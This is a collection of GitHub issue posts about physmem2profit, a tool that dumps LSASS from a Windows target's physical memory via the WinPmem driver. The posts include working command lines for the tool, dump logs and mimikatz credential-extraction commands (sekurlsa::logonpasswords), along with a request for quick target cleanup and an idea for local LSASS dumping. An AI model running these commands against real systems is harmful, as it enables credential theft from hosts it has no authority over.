Hello and thanks for the great tool. I could use it successfully. But, in the current state, there is no option to unload the driver after the dump is done, I think it would be a great feature to unsure a target can be quickly cleaned.

On a side note, the reconstruction of a minidump by Rekall seems rather unstable as many dumps performed on various versions of Windows 10 were not parsable by mimikatz or even pypykatz. But, doing multiple dumps on the same target can yield success from the tests have performed.

I've attempted to dump against several Windows 10 systems, each time running the client several times to ensure multiple dumps (as suggested in issue #3). Additionally I have cleared the rekall cache as suggested. Im still unable to get a minidump from Windows 10 that I can successfully read in mimikatz. Any suggestions?

Compiled the server portion on Microsoft Windows [Version 10.0.18363.752] Visual Studio Community 2019 version 16.3.9.

Ran on Microsoft Windows [Version 10.0.17763.1098] with:

Physmem2profit.exe --ip 1.2.3.4

Client running on Kali - Run with:

python3 physmem2profit --host 1.2.3.4 --port 8080 --mode all --driver winpmem --install att_winpmem_64.sys --label balls
[*] Connecting to 1.2.3.4 on port 8080
[*] Connected
[*] Loading config from config.json
[*] Driver installed
[*] Wrote config to config.json
[*] Exposing the physical memory as a file
[*] Analyzing physical memory
[*] Finding LSASS process
[*] LSASS found
[*] Checking for Credential Guard...
[*] No Credential Guard detected
[*] Collecting data for minidump: system info
[*] Collecting data for minidump: module info
[*] Collecting data for minidump: memory info and content
[*] Generating the minidump file
[*] Wrote LSASS minidump to output/balls-2020-04-08-lsass.dmp

Attempting to grab the credentials with mimikatz:

  .#####.   mimikatz 2.2.0 (x64) #18362 Mar  8 2020 13:32:41
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::minidump balls-2020-04-08-lsass.dmp
Switch to MINIDUMP : 'balls-2020-04-08-lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'balls-2020-04-08-lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

Cheers

during the compilation of the client I have the following error:

` x86_64-linux-gnu-gcc -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -g -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -DBLAKE2_COMPRESS_SSE2=1 -I/opt/physmem2profit/client/.env/include -I/usr/include/python3.10 -c impl/blake2b.c -o build/temp.linux-x86_64-3.10/impl/blake2b.o
In file included from impl/blake2b.c:18:
impl/blake2.h:101:5: error: size of array element is not a multiple of its alignment
101 | blake2s_state S[8][1];
| ^~~~~~~~~~~~~
impl/blake2.h:102:5: error: size of array element is not a multiple of its alignment
102 | blake2s_state R[1];
| ^~~~~~~~~~~~~
impl/blake2.h:109:5: error: size of array element is not a multiple of its alignment
109 | blake2b_state S[4][1];
| ^~~~~~~~~~~~~
impl/blake2.h:110:5: error: size of array element is not a multiple of its alignment
110 | blake2b_state R[1];
| ^~~~~~~~~~~~~
impl/blake2b.c: In function ‘blake2b’:
impl/blake2b.c:293:3: error: size of array element is not a multiple of its alignment
293 | blake2b_state S[1];
| ^~~~~~~~~~~~~
impl/blake2b.c: At top level:
impl/blake2b.c:29:22: warning: ‘blake2b_sigma’ defined but not used [-Wunused-const-variable=]
29 | static const uint8_t blake2b_sigma[12][16] =
| ^~~~~~~~~~~~~
error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> pyblake2
`

I seem to be having issues with the physmem2profit service on my bare-metal Windows 10 host. Any suggesstions?

Compiled with Microsoft Visual Studio Community 2019 version 16.5.5

Ran on Microsoft Windows Version 10 2004 update:
.\Physmem2profit.exe --ip 192.168.128.142 -p 80 --verbose

Attacking machine command:
python3 physmem2profit --host 192.168.128.142 --port 80 --mode all --driver winpmem --install c:/temp/att_winpmem_64.sys --label foobar

Receiving the following output from the Windows 10 host after attacking with my Kali machine:

[+] Found driver bridge: WinPmem.
[+] Registered command: Install.  
[+] Registered command: Uninstall.  
[+] Registered command: Map.
[+] Registered command: Read.
[*] Starting server on 192.168.128.142:21...
[+] Server Started.
[*] Waiting for a connection...
[+] Connected!
[*] Invoking Command Install for driver WinPmem.
[*] Installing service...
[*] Creating service physmem2profit...
[+] Service created successfully.
[*] Starting service...
[*] Service is stopped. Trying to start it...
[-] Service Failed to start. 31: A device attached to the system is not functioning
[*] Invoking Command Uninstall for driver WinPmem.
[?] Service already stopped.
[+] Successfully unloaded the WinPMem driver.
[*] Exit command received. Terminating.

After a dump of lsass, mimikatz or pypykatz are not able to parse the result

mimikatz # sekurlsa::minidump 123.dmp
Switch to MINIDUMP : '123.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : '123.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

mimikatz #

fixed

I got a weird issue, on client

[root:...ysmem/physmem2profit/client]# python3 physmem2profit --mode all --host 192.168.17.162 --port 8081 --driver winpmem --install C:\Users\att_winpmem_64.sys --label dg-gdsf (public✱) [*] Connecting to 192.168.17.162 on port 8081 [*] Connected [*] Loading config from config.json Process Process-1: Traceback (most recent call last): File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap self.run() File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run self._target(*self._args, **self._kwargs) File "physmem2profit/__main__.py", line 57, in <lambda> jobs.append(Process(target=lambda: mount.mount(socket, args.driver, args.install))) # mount will block thread, it need to be handled by child process. File "physmem2profit/mount.py", line 351, in mount fuse = FUSE(Physmem(sock, mountpoint, driver, installArguments), mountpoint, nothreads=True, foreground=True) File "physmem2profit/mount.py", line 46, in __init__ raise Exception(struct.unpack("<%ds" % response, self.socket.recv(response))[0].decode('utf-8')) Exception: Driver file does not exist. [*] Read 0 MB, cached reads 0 MB Process Process-2: Traceback (most recent call last): File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap self.run() File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run self._target(*self._args, **self._kwargs) File "physmem2profit/__main__.py", line 59, in <lambda> jobs.append(Process(target=lambda: physmem2minidump.dump(args.label))) File "physmem2profit/physmem2minidump.py", line 144, in dump ensureFileExist(CONFIG_FILE) File "physmem2profit/physmem2minidump.py", line 134, in ensureFileExist raise Exception('File does not exist: ' + path) Exception: File does not exist: config.json [root:...ysmem/physmem2profit/client]#

Then on server,

[*] Registering driver bridges. [+] Found driver bridge: WinPmem. [+] Registered command: Install. [+] Registered command: Uninstall. [+] Registered command: Map. [+] Registered command: Read. [*] Starting server on 192.168.17.162:8081... [+] Server Started. [*] Waiting for a connection... [+] Connected! [*] Installing service... [*] Creating service physmem2profit... [-] Driver file does not exist.

though I downloaded the driver and place it in the same folder.

Not an issue and I'll be closing this immediately. I just wanted to provide some documentation for how to build the phys2memprofit server solution in case others run into similar errors building this.

If you're getting syntax errors when trying to build this project as-is, you're likely not using the correct version of Visual Studio or the .NET Framework. Here's how to build this solution.

1. Download Visual Studio 2019 Community from here.

2. Run the installer. When choosing add-ons for the installation, select ".NET Desktop Environment".

3. You should be okay to build the solution now. Make sure you select the "Release" tag too.

Thanks for making this tool!

Unfortunately, I haven't used rekall before, so I couldn't solve the below issue
The "dump" function has a config.json file which seems to be necessary to dump the remote physical memory.

    CONFIG_FILE = 'config.json'
    print("[*] Loading config from %s" % (CONFIG_FILE))
    ensureFileExist(CONFIG_FILE)
    with open(CONFIG_FILE) as f:
        config = json.load(f)

and because it doesn't exist, "ensureFileExist()" crashes.

============= output on the client ============
[] Connecting to 192.168.43.209 on port 8080
[] Connected
[*] Loading config from config.json
Process Process-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
self.run()
File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
self._target(self._args, **self._kwargs)
File "main.py", line 57, in
jobs.append(Process(target=lambda: mount.mount(socket, args.driver, args.install))) # mount will block thread, it need to be handled by child process.
File "/root/Desktop/test/physmem2profit/client/mount.py", line 351, in mount
fuse = FUSE(Physmem(sock, mountpoint, driver, installArguments), mountpoint, nothreads=True, foreground=True)
File "/root/Desktop/test/physmem2profit/client/mount.py", line 46, in init
raise Exception(struct.unpack("<%ds" % response, self.socket.recv(response))[0].decode('utf-8'))
Exception: Driver file does not exist.
[] Read 0 MB, cached reads 0 MB
Process Process-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/multiprocessing/process.py", line 297, in _bootstrap
self.run()
File "/usr/lib/python3.7/multiprocessing/process.py", line 99, in run
self._target(*self._args, **self._kwargs)
File "main.py", line 59, in
jobs.append(Process(target=lambda: physmem2minidump.dump(args.label)))
File "/root/Desktop/test/physmem2profit/client/physmem2minidump.py", line 144, in dump
ensureFileExist(CONFIG_FILE)
File "/root/Desktop/test/physmem2profit/client/physmem2minidump.py", line 134, in ensureFileExist
raise Exception('File does not exist: ' + path)
Exception: File does not exist: config.json

============================================

============ output on server =====================

[] Registering driver bridges.
[+] Found driver bridge: WinPmem.
[+] Registered command: Install.
[+] Registered command: Uninstall.
[+] Registered command: Map.
[+] Registered command: Read.
[] Starting server on 192.168.43.209:8080...
[+] Server Started.
[] Waiting for a connection...
[+] Connected!
[] Installing service...
[*] Creating service physmem2profit...
[-] Driver file does not exist.

Also, I don't know why the server can't find the driver (it does exist in the same directory).

Hello, I used this awesome tools multiple times and it worked wonderfully well.

I tried to use it again today but I could not install the required rekall dependencies, many errors are poping and it does not seem easily fixable at a first glance. I also saw that the project was discontinued (rekall).

Do you know if a distribution can currently install the dependencies or if there is any way to tweak the dependencies for the projet to work ?

Regards

Hello there,

First of all, I wanna thank you for this awesome tool . I love the idea, and it works 90% of the time, life saver. Great research.

And because it is awesome, I was thinking about a way to dump lsass locally using this tool. Since the physical memory is exposed as a file over TCP, I guess it wouldn't be that difficult to have a client in C# that would locally connect to the server and dump lsass on the target disk.

This way, there would be a single tool that would

1. expose RAM on 127.0.0.1:<port>
2. connect to that local port and dump lsass directly on the host

Do you think it is possible (theoretically) or am I missing something?

I'm not asking you to actually develop this, it's more of a thought sharing process, is it possible, is there something I forgot, what do you think about it,...

Again, thank you!